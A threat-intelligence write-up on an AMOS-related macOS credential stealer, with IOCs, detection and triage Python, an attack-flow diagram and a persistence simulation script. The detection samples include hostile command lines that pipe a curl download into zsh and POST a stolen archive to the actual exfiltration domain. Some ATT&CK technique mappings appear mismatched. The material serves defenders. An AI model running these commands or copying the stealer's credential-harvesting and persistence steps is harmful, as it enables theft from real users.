SOC Prime Bias: Medium

08 Apr 2026 14:50

MacOS Stealers, Observed: What Defenders Should Watch For

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The article profiles a macOS credential stealer associated with the AMOS ecosystem, delivered through fake software update pages. Victims are pushed to run a command chain that pulls a helper binary from rvdownloads.com, executes it via zsh, and triggers obfuscated AppleScript to harvest passwords, browser artifacts, crypto wallet extensions, Apple Notes, and local files. Persistence is established using a malicious LaunchAgent plist that masquerades as a legitimate Spotlight component. The write-up also shares observed IOCs and the analysis steps used to validate the infection flow.

Investigation

The researcher captured the initial curl one-liner that fetched a Base64-encoded URL, decoded it, and observed a follow-up curl download of the helper binary. The helper executed two AppleScripts: one for VM detection and another that handled collection and exfiltration. The stealer pulled credentials from the Keychain, attempted to terminate security tooling, harvested browser and wallet data, copied Apple Notes, bundled results into an archive, and uploaded it to laislivon.com. Persistence was created by installing a LaunchAgent that re-runs the full script chain at user login.

Mitigation

Reduce exposure by blocking the identified malicious domains, restricting execution of unsigned scripts, and monitoring for unusual launchctl load activity tied to new LaunchAgents. Use endpoint controls that flag suspicious combinations of curl and osascript, especially when pulling remote content from unfamiliar hosts. Limit privileged execution where possible and apply application allow-listing to prevent untrusted helper binaries from launching.
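The monitoring points above (curl piped through base64 into a shell, osascript spawned from a shell, launchctl loading an Apple-named plist from a user LaunchAgents directory, staging into /tmp/archive.tar.gz, and the two domains named in this write-up) expressed as detection logic over constructed process telemetry. This is an added example, not SOC Prime's rule or the stealer's code; the event shape (parent, process, cmdline) and every sample command line are assumptions, and the placeholder host updates.example.invalid is constructed.

```python
import re

# Domains named in the write-up: rvdownloads.com (helper download) and
# laislivon.com (archive upload). All telemetry below is constructed.
BLOCKED_DOMAINS = {"rvdownloads.com", "laislivon.com"}

def loads_apple_named_user_agent(cmdline):
    """True when launchctl loads a com.apple.* plist from a LaunchAgents dir that is
    not Apple's own (/System/Library); the stealer writes its plist to a home dir."""
    if not re.search(r"\blaunchctl\s+(load|bootstrap)\b", cmdline):
        return False
    m = re.search(r"(\S+)/Library/LaunchAgents/com\.apple\.[^\s/]+\.plist", cmdline)
    return m is not None and not m.group(1).startswith("/System")

# Each rule maps a name to a predicate over one event {parent, process, cmdline};
# that event shape is an assumption about what endpoint telemetry provides.
RULES = {
    "curl_base64_decode_piped_to_shell": lambda e: (
        "curl" in e["cmdline"]
        and re.search(r"base64\s+(-d|-D|--decode)", e["cmdline"]) is not None
        and re.search(r"\|\s*(zsh|bash|sh)\b", e["cmdline"]) is not None),
    "known_stealer_domain": lambda e: any(d in e["cmdline"] for d in BLOCKED_DOMAINS),
    "osascript_spawned_by_shell": lambda e: (
        e["process"] == "osascript" and e["parent"] in {"zsh", "bash", "sh"}),
    "launchctl_load_apple_named_user_agent": lambda e: loads_apple_named_user_agent(e["cmdline"]),
    "tar_gz_staging_in_tmp": lambda e: (
        e["process"] == "tar"
        and re.search(r"\s-[a-zA-Z]*c", e["cmdline"]) is not None      # create flag
        and re.search(r"/tmp/\S+\.tar\.gz", e["cmdline"]) is not None),
}

def evaluate(event):
    """Names of every rule the event matches; an empty list means nothing fired."""
    return [name for name, pred in RULES.items() if pred(event)]

# Constructed process events following the chain described in the write-up.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "process": "zsh",
     "cmdline": "curl -fsSL https://updates.example.invalid/u | base64 -d | zsh"},
    {"parent": "zsh", "process": "osascript", "cmdline": "osascript /tmp/.collect.scpt"},
    {"parent": "zsh", "process": "tar",
     "cmdline": "tar -czf /tmp/archive.tar.gz -C /tmp/stolen_data ."},
    {"parent": "zsh", "process": "curl",
     "cmdline": "curl -X POST -F file=@/tmp/archive.tar.gz https://laislivon.com/upload"},
    {"parent": "zsh", "process": "launchctl",
     "cmdline": "launchctl load /Users/alice/Library/LaunchAgents/com.apple.mdworker.plist"},
    {"parent": "Terminal", "process": "curl",           # benign download for contrast
     "cmdline": "curl -fsSL https://example.com/index.html -o /tmp/index.html"},
]
```

The user-directory check also fires on the Linux simulation below, where $HOME/Library/LaunchAgents stands in for ~/Library/LaunchAgents.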

Response

If indicators are found, isolate the endpoint, terminate active malicious processes, remove the helper binary, and delete the rogue LaunchAgent plist. Reset potentially exposed credentials and tokens, prioritizing Keychain secrets and browser-stored data. Collect forensic artifacts for the listed IOCs, review system logs for curl/osascript execution, and monitor for repeated callbacks or download attempts tied to the same C2 infrastructure.
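A triage helper for the "delete the rogue LaunchAgent plist" step: it parses every plist in a LaunchAgents directory with the standard-library plistlib and reports Apple-named labels outside /System/Library, interpreters or downloaders in ProgramArguments, and RunAtLoad on anything already flagged. This is an added example, not SOC Prime's tooling; the watched-binary set and both sample plists (only the com.apple.mdworker label comes from the write-up) are constructed assumptions.

```python
import os
import plistlib
import tempfile

# Interpreters and downloaders that rarely belong in a user's LaunchAgent; the set is
# a judgement call for this example, not a list from the write-up.
WATCHED_BINARIES = {"osascript", "curl", "zsh", "bash", "sh", "base64"}

def triage_launchagent(path):
    """Return findings for one LaunchAgent plist (empty list = nothing odd)."""
    with open(path, "rb") as fh:
        agent = plistlib.load(fh)
    label = agent.get("Label", "")
    args = agent.get("ProgramArguments") or [agent.get("Program", "")]
    findings = []
    # Apple's own agents live under /System/Library/LaunchAgents; a com.apple.* label
    # anywhere else (e.g. ~/Library/LaunchAgents) is the masquerade the write-up describes.
    if label.startswith("com.apple.") and not path.startswith("/System/Library/"):
        findings.append(f"apple_label_outside_system:{label}")
    for binary in (os.path.basename(a) for a in args if isinstance(a, str)):
        if binary in WATCHED_BINARIES:
            findings.append(f"runs:{binary}")
    if findings and agent.get("RunAtLoad"):
        findings.append("run_at_load")  # re-runs at every login, i.e. the persistence step
    return findings

def triage_directory(agents_dir):
    """Map each *.plist in a LaunchAgents directory to its findings."""
    return {name: triage_launchagent(os.path.join(agents_dir, name))
            for name in sorted(os.listdir(agents_dir)) if name.endswith(".plist")}

def build_samples():
    """Write two constructed plists to a temp dir: one mimicking the rogue agent, one benign."""
    agents_dir = os.path.join(tempfile.mkdtemp(), "Library", "LaunchAgents")
    os.makedirs(agents_dir)
    samples = {
        "com.apple.mdworker.plist": {           # label taken from the write-up's IOC
            "Label": "com.apple.mdworker",
            "ProgramArguments": ["/usr/bin/osascript", "/Users/alice/.cache/update.scpt"],
            "RunAtLoad": True},
        "com.example.backup.plist": {           # constructed benign third-party agent
            "Label": "com.example.backup",
            "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
            "RunAtLoad": True},
    }
    for name, content in samples.items():
        with open(os.path.join(agents_dir, name), "wb") as fh:
            plistlib.dump(content, fh)
    return agents_dir

if __name__ == "__main__":
    for name, findings in triage_directory(build_samples()).items():
        print(name, "->", findings or "clean")
```

On a real host point triage_directory at ~/Library/LaunchAgents, unload a flagged agent with launchctl before deleting it, and keep a copy of the plist as a forensic artifact.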

Attack Flow

    graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef technique fill:#ffedcc
    classDef process fill:#e2e2ff

    %% Nodes – Actions
    action_initial_access["<b>Action</b> – <b>T1219 Remote Access Tools</b><br/>Execute a curl command that decodes a base64 URL and runs a zsh shell to download a secondary payload from rvdownloads.com/frozenfix/update."]
    class action_initial_access action
    action_obfuscation["<b>Action</b> – <b>T1027 Obfuscation</b><br/>Helper script hides strings using Base64, custom arithmetic, binary padding and junk code insertion."]
    class action_obfuscation action
    action_sandbox_evasion["<b>Action</b> – <b>T1497.002 Virtualization Sandbox Evasion</b><br/>AppleScript checks system_profiler output for VM indicators such as QEMU, VMware and KVM."]
    class action_sandbox_evasion action
    action_credential_harvest["<b>Action</b> – <b>T1056.002 GUI Input Capture</b><br/>Forged osascript dialog prompts for admin password, validates it against the Keychain and stores it in ~/.pwd."]
    class action_credential_harvest action
    action_defense_evasion["<b>Action</b> – <b>T1027.005 Indicator Removal from Tools</b><br/>Malware terminates Little Snitch and BlockBlock and unloads their launch agents."]
    class action_defense_evasion action
    action_browser_theft["<b>Action</b> – <b>T1217 Browser Information Discovery</b><br/>Enumerates Chrome, Brave, Edge, Opera and Firefox profiles and extracts login data, cookies, autofill and extension data, targeting crypto-wallet extensions."]
    class action_browser_theft action
    action_notes_theft["<b>Action</b> – Apple Notes Data Theft<br/>Copies the Notes SQLite database and associated media files to a staging folder."]
    class action_notes_theft action
    action_data_staging["<b>Action</b> – <b>T1132 Data Encoding</b><br/>Copies collected files to /tmp/stolen_data and compresses them into archive.tar.gz."]
    class action_data_staging action
    action_c2["<b>Action</b> – <b>T1102 Web Service</b><br/>Uploads the compressed archive via a curl POST to https://laislivon.com/upload."]
    class action_c2 action
    action_persistence["<b>Action</b> – <b>T1543.001 Launch Agent Persistence</b><br/>Writes a LaunchAgent plist (com.apple.mdworker.plist) to ~/Library/LaunchAgents and loads it with launchctl."]
    class action_persistence action
    action_execution["<b>Action</b> – <b>T1127.003 Trusted Developer Utilities Proxy Execution</b><br/>Executes the malicious AppleScript on each login using osascript, leveraging trusted developer utilities."]
    class action_execution action

    %% Nodes – Tools
    tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Description</b>: Transfers data from remote servers using URL syntax."]
    class tool_curl tool
    tool_osascript["<b>Tool</b> – <b>Name</b>: osascript<br/><b>Description</b>: Executes AppleScript or JavaScript for Automation scripts on macOS."]
    class tool_osascript tool
    tool_launchctl["<b>Tool</b> – <b>Name</b>: launchctl<br/><b>Description</b>: Manages launch agents and daemons on macOS."]
    class tool_launchctl tool

    %% Nodes – Techniques (additional detail)
    tech_T1027_008["<b>Technique</b> – T1027.008 Stripped Payloads<br/>Payloads are stripped of symbols and debugging information to hinder analysis."]
    class tech_T1027_008 technique
    tech_T1027_001["<b>Technique</b> – T1027.001 Binary Padding<br/>Adds non-functional bytes to binaries to change size and hash."]
    class tech_T1027_001 technique
    tech_T1027_007["<b>Technique</b> – T1027.007 Dynamic API Resolution<br/>Resolves API calls at runtime to avoid static detection."]
    class tech_T1027_007 technique
    tech_T1027_016["<b>Technique</b> – T1027.016 Junk Code Insertion<br/>Inserts irrelevant instructions to confuse analysis tools."]
    class tech_T1027_016 technique
    tech_T1140["<b>Technique</b> – T1140 Deobfuscate/Decode Files or Information<br/>Decodes or deobfuscates data before execution."]
    class tech_T1140 technique
    tech_T1555_001["<b>Technique</b> – T1555.001 Credentials from Password Stores: Keychain<br/>Extracts stored credentials from the macOS Keychain."]
    class tech_T1555_001 technique
    tech_T1555_002["<b>Technique</b> – T1555.002 Credentials from Password Stores: Securityd Memory<br/>Reads credentials from the security daemon memory."]
    class tech_T1555_002 technique
    tech_T1555_003["<b>Technique</b> – T1555.003 Credentials from Web Browsers<br/>Steals saved passwords from browsers."]
    class tech_T1555_003 technique
    tech_T1606_001["<b>Technique</b> – T1606.001 Forge Web Credentials: Web Cookies<br/>Collects browser cookies for session hijacking."]
    class tech_T1606_001 technique
    tech_T1132_001["<b>Technique</b> – T1132.001 Standard Encoding<br/>Uses standard encoding (e.g., gzip) for data compression."]
    class tech_T1132_001 technique
    tech_T1546_009["<b>Technique</b> – T1546.009 Event Triggered Execution: AppCert DLLs<br/>Triggers execution via trusted system events."]
    class tech_T1546_009 technique

    %% Flow Connections
    action_initial_access -->|uses| tool_curl
    tool_curl -->|downloads| action_obfuscation
    action_obfuscation -->|employs| tech_T1027_008
    action_obfuscation -->|employs| tech_T1027_001
    action_obfuscation -->|employs| tech_T1027_007
    action_obfuscation -->|employs| tech_T1027_016
    action_obfuscation -->|employs| tech_T1140
    action_obfuscation -->|leads to| action_sandbox_evasion
    action_sandbox_evasion -->|checks for| tech_T1497_002
    action_sandbox_evasion -->|leads to| action_credential_harvest
    action_credential_harvest -->|uses| tool_osascript
    action_credential_harvest -->|captures| tech_T1056_002
    action_credential_harvest -->|extracts| tech_T1555_001
    action_credential_harvest -->|extracts| tech_T1555_002
    action_credential_harvest -->|leads to| action_defense_evasion
    action_defense_evasion -->|removes| tech_T1027_005
    action_defense_evasion -->|leads to| action_browser_theft
    action_browser_theft -->|discovers| tech_T1217
    action_browser_theft -->|steals| tech_T1555_003
    action_browser_theft -->|collects| tech_T1606_001
    action_browser_theft -->|leads to| action_notes_theft
    action_notes_theft -->|stores in| action_data_staging
    action_data_staging -->|compresses with| tech_T1132
    action_data_staging -->|uses encoding| tech_T1132_001
    action_data_staging -->|leads to| action_c2
    action_c2 -->|uploads via| tool_curl
    action_c2 -->|uses| tech_T1102
    action_c2 -->|leads to| action_persistence
    action_persistence -->|creates| tech_T1543_001
    action_persistence -->|loads with| tool_launchctl
    action_persistence -->|leads to| action_execution
    action_execution -->|executes with| tool_osascript
    action_execution -->|leverages| tech_T1127_003
    action_execution -->|triggered by| tech_T1546_009

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    An attacker who has gained user‑level access on the victim machine wants to establish persistence and exfiltrate collected credentials.

    1. Persistence: The attacker writes a malicious LaunchAgent plist to the standard macOS LaunchAgents directory (simulated on the Linux collector via a home‑directory path).
    2. Data Collection: Sensitive files are copied to a staging folder.
    3. Exfiltration Preparation: The staged data are archived into /tmp/archive.tar.gz using the native tar utility.
    4. Activation: The attacker loads the LaunchAgent with launchctl, causing the malicious code to execute on each user login.

    The exact command lines match the strings watched by the rule, ensuring an alert is generated.

  • Regression Test Script:

    #!/usr/bin/env bash
    set -euo pipefail
    
    # 1. Create a dummy "stolen" file
    echo "password123" > /tmp/credentials.txt
    
    # 2. Create malicious LaunchAgent plist (simulated location: on the Linux
    #    collector $HOME/Library/LaunchAgents stands in for ~/Library/LaunchAgents)
    PLIST_PATH="$HOME/Library/LaunchAgents/com.apple.mdworker.plist"
    mkdir -p "$(dirname "$PLIST_PATH")"
    cat > "$PLIST_PATH" <<'EOF'
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Label</key><string>com.apple.mdworker</string>
        <key>ProgramArguments</key>
        <array>
            <string>/usr/bin/cat</string>
            <string>/tmp/credentials.txt</string>
        </array>
        <key>RunAtLoad</key><true/>
    </dict>
    </plist>
    EOF
    
    # 3. Archive the "stolen" data (exact path the rule watches)
    tar -czf /tmp/archive.tar.gz -C /tmp credentials.txt
    
    # 4. Load the LaunchAgent (this generates the command line the rule monitors).
    #    launchctl exists only on macOS; on the Linux collector the call fails, so
    #    do not let "set -e" abort the run before the summary line.
    launchctl load "$PLIST_PATH" || echo "launchctl not available on this host"
    
    echo "Simulation complete – detection should have fired."

  • Cleanup Commands:

    #!/usr/bin/env bash
    set -euo pipefail
    
    # Unload the LaunchAgent
    launchctl unload "$HOME/Library/LaunchAgents/com.apple.mdworker.plist" || true
    
    # Remove files
    rm -f "$HOME/Library/LaunchAgents/com.apple.mdworker.plist"
    rm -f /tmp/archive.tar.gz
    rm -f /tmp/credentials.txt
    
    echo "Cleanup finished."